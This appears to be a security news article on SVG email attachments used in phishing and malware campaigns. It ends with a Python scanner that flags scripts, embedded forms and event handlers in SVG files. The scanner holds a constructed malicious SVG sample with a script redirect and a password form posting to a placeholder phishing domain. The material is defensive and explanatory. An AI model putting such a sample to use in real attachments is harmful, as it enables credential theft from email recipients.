Decrypt LOL

Increase in SVG Attachments Used in Phishing Campaigns


Quick take - Threat actors are increasingly using Scalable Vector Graphics (SVG) attachments in phishing and malware distribution campaigns. SVG files pose significant security risks because they can render HTML and execute JavaScript, and they often evade detection by conventional security software.

Fast Facts

  • Threat actors are increasingly using Scalable Vector Graphics (SVG) attachments in phishing and malware campaigns, marking a shift in tactics.
  • Unlike pixel-based formats like JPG or PNG, SVG images are vector-based and can render HTML and execute JavaScript, posing significant security risks.
  • Recent SVG files have been found mimicking familiar formats, such as Excel spreadsheets, to capture user credentials through fake login forms.
  • SVG attachments often evade detection by conventional security software due to their textual nature, leading to alarmingly low detection rates.
  • Security experts recommend deleting emails with SVG attachments unless the recipient is a developer expecting such files, to mitigate associated risks.

Threat Actors Exploit SVG Attachments in Phishing and Malware Campaigns

A Notable Shift in Tactics

Threat actors are increasingly exploiting Scalable Vector Graphics (SVG) attachments in phishing and malware distribution campaigns. Unlike common web image formats such as JPG or PNG, which consist of pixels, SVG images are vector-based. They are created using mathematical formulas to represent lines, shapes, and text. This fundamental difference allows SVG images to resize without losing quality, making them adaptable for various screen resolutions.

Rising Use in Phishing Schemes

Security researchers, including the MalwareHunterTeam, have observed a rise in the use of SVG files in phishing schemes, particularly noting their deployment in campaigns associated with Qbot malware. SVG attachments can do more than display graphics: they can also render HTML and execute JavaScript when opened, presenting a significant security risk. Recent malicious SVG files have been identified that mimic familiar formats, such as Excel spreadsheets, embedding fake login forms designed to capture user credentials. Additionally, some SVGs have been crafted to impersonate official documents, enticing users to download malware.

Challenges in Detection and Recommendations

In more sophisticated attacks, SVG attachments may contain embedded JavaScript that redirects users to phishing websites immediately upon opening the file. One of the challenges in combating this emerging threat is that SVG files often evade detection by conventional security software due to their textual nature. Analysis of SVG attachment samples has revealed alarmingly low detection rates, with some files showing only one or two detections by security programs.

Given that receiving SVG attachments is uncommon in legitimate emails, security experts advise exercising extreme caution with such files. It is recommended to delete any emails containing SVG attachments unless the recipient is a developer who is explicitly expecting these types of files. This precautionary measure is essential to mitigate the risks associated with the increasing use of SVGs in cyberattacks.
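As an added example (not from the original article), here is a minimal Python check that a mail gateway or analyst could run over an SVG attachment to flag the active content described above: script elements, embedded HTML forms, event handlers and script URLs. The sample files, the tag and attribute lists and the function names are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: an SVG posing as a document, with a script redirect and
# an HTML login form inside <foreignObject>. The domain is a placeholder.
SAMPLE_MALICIOUS = """<svg xmlns="http://www.w3.org/2000/svg" width="400" height="200">
  <script>window.location.href = "https://phish.example.invalid/login";</script>
  <foreignObject width="400" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://phish.example.invalid/c">
      <input type="password" name="p"/>
    </form>
  </foreignObject>
  <rect width="10" height="10" onload="init()"/>
</svg>"""

SAMPLE_BENIGN = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form"}
URL_ATTRS = {"href", "src", "action"}          # includes xlink:href after stripping
SCRIPT_SCHEMES = ("javascript:", "data:text/html")

def local(name):
    """Strip an XML namespace: '{ns}tag' -> 'tag', lowercased."""
    return name.rsplit("}", 1)[-1].lower()

def scan_svg(text):
    """Return a sorted list of findings that indicate active content."""
    if "<!entity" in text.lower():
        return ["entity-declaration"]  # flag instead of expanding entities
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return ["unparseable"]  # treat malformed SVG as suspicious
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.add(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):  # onload, onclick, ...
                findings.add(f"handler:{name}")
            if name in URL_ATTRS and value.strip().lower().startswith(SCRIPT_SCHEMES):
                findings.add(f"script-url:{name}")
    return sorted(findings)
```

Any non-empty result is a reason to quarantine the attachment for review; an empty result only means none of these specific markers were found.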
